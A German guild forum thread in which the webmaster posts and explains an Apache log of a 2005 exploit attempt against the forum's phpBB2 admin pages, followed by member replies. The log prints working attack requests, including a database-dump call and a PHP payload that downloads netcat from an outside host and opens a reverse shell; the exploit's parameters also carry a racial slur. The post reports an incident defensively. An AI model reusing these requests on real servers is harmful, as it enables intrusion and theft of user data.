Zurück Neue Antwort erstellen
Chaly 
(Thema erstellt)
Offizier · Webmaster 
Themen: 403
Beiträge: 2106
Location: Bad Honnef
Playing:  Guildwars2 (Drakkar See)
Ingame:  Chaly Flavour
Jahre im Forum: * * * * * * * * * * * * * * * * *
Exploitangriff auf Zornforum.. Verfasst am: Beitrag 10:38 Mo - Aug 22, 2005

Hi

Code:

84.27.136.30 - - [22/Aug/2005:21:40:14 +0200] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1" 200 8939
84.27.136.30 - - [22/Aug/2005:21:40:15 +0200] "POST /phpBB2/admin/admin_db_utilities.php?sid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1" 200 1642
84.27.136.30 - - [22/Aug/2005:21:40:15 +0200] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1" 200 15954
84.27.136.30 - - [22/Aug/2005:21:40:16 +0200] "GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&niggaip=84.27.136.30&niggaport=1339&nigga=$a=fopen(\"http://140.164.60.216/paul/nc\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1" 200 10107
84.27.136.30 - - [22/Aug/2005:21:40:16 +0200] "GET / HTTP/1.1" 200 4199
84.27.136.30 - - [22/Aug/2005:21:40:16 +0200] "GET / HTTP/1.1" 200 4199


Das ist der Apache-Log zum Zeitpunkt des Exploitversuchs..
Wem das nichts sagt.. der Angriff war ganz gut, es nennt sich "nigga"-Exploit und hätte:
- die Forumsdatenbank vollständig herunterladen können (inklusive PM''s, also auch aller Passwörter, etc, etc, die im Forum gepostet wurden) in Zeile 1 und 2.
- eine Art linux-trojaner, eine remote-console auf dem webserver hier installieren können.

Funktioniert hats immerhin, die komplette datenbankstruktur herunterzuladen und das forums-skin zu deinstallieren.

84.27.136.30 ist eine dynamische IP aus Holland die über 11 Stationen umgeleitet versucht hat das Forum zu exploiten.
Sollte das kein breiter IP-Scan mit anschliessendem Hackversuch auf Webservern gewesen sein, sondern gezielt auf das Zorn-Forum gerichtet gewesen sein, sollten die restlichen Forumadmins mal ihre phpBB-Version überprüfen.

and once again a mail to a provider ...
Antworten mit Zitat



_________________

Chalys Gimpnesstheory (2003) Die Theorie der expotentiellen Bullshits den Gimps bei gleichbleibendem Anteil produzieren.
Salope 
Super Chicken 
Themen: 8
Beiträge: 165
 
 
Jahre im Forum: * * * * * * * * * * * * * * *
Verfasst am: Beitrag 06:37 Di - Aug 23, 2005

Super der Herr Papi. =] Antworten mit Zitat



_________________
Solinari 
Prime Chicken 
Themen: 30
Beiträge: 348
 
 
Jahre im Forum: * * * * * * * * * * * * * * * *
Verfasst am: Beitrag 09:58 Di - Aug 23, 2005

.. und ich dachte Chaly spielt nur n bisl mit den Skins rum strichauge Antworten mit Zitat


Phex 
Champion Chicken 
Themen: 2
Beiträge: 79
Location: Saarland
 
 
Jahre im Forum: * * * * * * * * * * * * * * * *
Verfasst am: Beitrag 12:31 Di - Aug 23, 2005

Zitat:
84.27.136.30 ist eine dynamische IP aus Holland die über 11 Stationen umgeleitet versucht hat das Forum zu exploiten.
war bestimmt bekifft der gute lachen
Antworten mit Zitat



_________________
Chaly 
(Thema erstellt)
Offizier · Webmaster 
Themen: 403
Beiträge: 2106
Location: Bad Honnef
Playing:  Guildwars2 (Drakkar See)
Ingame:  Chaly Flavour
Jahre im Forum: * * * * * * * * * * * * * * * * *
Verfasst am: Beitrag 07:48 Mi - Okt 26, 2005

http://www.onlinekosten.de/news/artikel/18896
ciao zwinkern
Antworten mit Zitat



_________________

Chalys Gimpnesstheory (2003) Die Theorie der expotentiellen Bullshits den Gimps bei gleichbleibendem Anteil produzieren.
Azhmash 
Impressive Chicken 
Themen: 12
Beiträge: 121
 
 
Jahre im Forum: * * * * * * * * * * * * * * * *
Verfasst am: Beitrag 11:03 Mi - Okt 26, 2005

hängt sie auf lachen Antworten mit Zitat


Baranda 
Offizier · Boardadmin 
Themen: 163
Beiträge: 1554
Playing:  WOW
Ingame:  Baranda
Jahre im Forum: * * * * * * * * * * * * * * * * *
Verfasst am: Beitrag 02:12 Sa - Okt 29, 2005

die Strafe ist wohl ein Witz .. einen weiteren Monat Untersuchungshaft .. Antworten mit Zitat



_________________
***
Wenn die Klügeren immer nachgeben, geschieht nur das, was die Dummen wollen!
***
Baranda @ WOW (Druidin)
Zurück Neue Antwort erstellen